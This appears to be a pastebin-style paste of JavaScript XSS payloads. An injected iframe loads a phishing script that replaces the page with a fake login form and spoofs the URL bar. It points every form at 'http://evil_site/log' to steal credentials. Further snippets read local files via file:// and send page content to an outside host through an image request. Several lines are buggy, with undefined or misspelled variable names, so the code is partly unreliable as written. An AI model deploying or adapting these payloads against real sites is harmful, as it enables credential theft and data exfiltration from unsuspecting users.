SHOW:
|
|
- or go back to the newest paste.
1 | @Abdelmoughite Eljoaydi | |
2 | ||
3 | /** | |
4 | <iframe src="http://evil_site/phishing.js"></iframe> | |
5 | *This payload injects an iframe tag that will load the script located at "/phishing.jsβ. | |
6 | *Letβs take a look at what phishing.js could contain: | |
7 | */ | |
8 | ||
9 | // Function to override the HTML content. | |
10 | function override(url) { | |
11 | var xhr_req = new XMLHttpRequest(); | |
12 | xhr_req.open('GET', url, false); | |
13 | xhr_req.onreadystatechange = function () { | |
14 | if (xhr_req.readyState == 4 && xhr_req.responseText != "") { | |
15 | document.innerHTML = xhr_req.responseText; | |
16 | } | |
17 | } | |
18 | xhr_req.send(null); | |
19 | } | |
20 | ||
21 | //Call override(url) function to override the current page with the content of "LoginForm.jsp". | |
22 | override("/console/login/LoginForm.jsp"); // we can extend this exploitation to CSRF attacks. | |
23 | ||
24 | //Spoofing current URI (URL bar will look like /console/login/LoginForm.jsp). | |
25 | var stateObj = { log: "login" }; | |
26 | history.pushState(stateObj, document.getElementsByTagName("title")[0].innerHTML, "/console/login/LoginForm.jsp"); | |
27 | ||
28 | //Hooking forms and submit victim credentials to "http://evil_site/log". | |
29 | var forms = document.getElementsByTagName("form"); | |
30 | for (index = 0; index < forms.length; index++) { | |
31 | void(forms[index].action = "http://evil_site/log"); | |
32 | } | |
33 | ============================================================================================================================== | |
34 | //Reading local files. (works only on Firefox) | |
35 | ||
36 | function _LFileAccess(_method,action,argv){ | |
37 | ||
38 | req.open(_method,action,false); | |
39 | if(_method=="POST") | |
40 | req.setRequestHeader("Content-Type","application/x-www-form-urlencoded"); | |
41 | req.send(argv); | |
42 | return req.responseText; | |
43 | } | |
44 | var local_file=_LFileAccess("GET","file://localhost/C:/PATH/",null); | |
45 | dump(local_file); | |
46 | ||
47 | //Screen-capture of the current page state. | |
48 | XMlHttpReq.open("GET","example.com",false); | |
49 | function getURL(s) { | |
50 | var image = new Image(); | |
51 | image.style.width = 0; | |
52 | image.style.height = 0; | |
53 | image.src = s; | |
54 | } | |
55 | getURL("http://example.com/page.php?pagecopie="+xmlHttpReq.responseText); |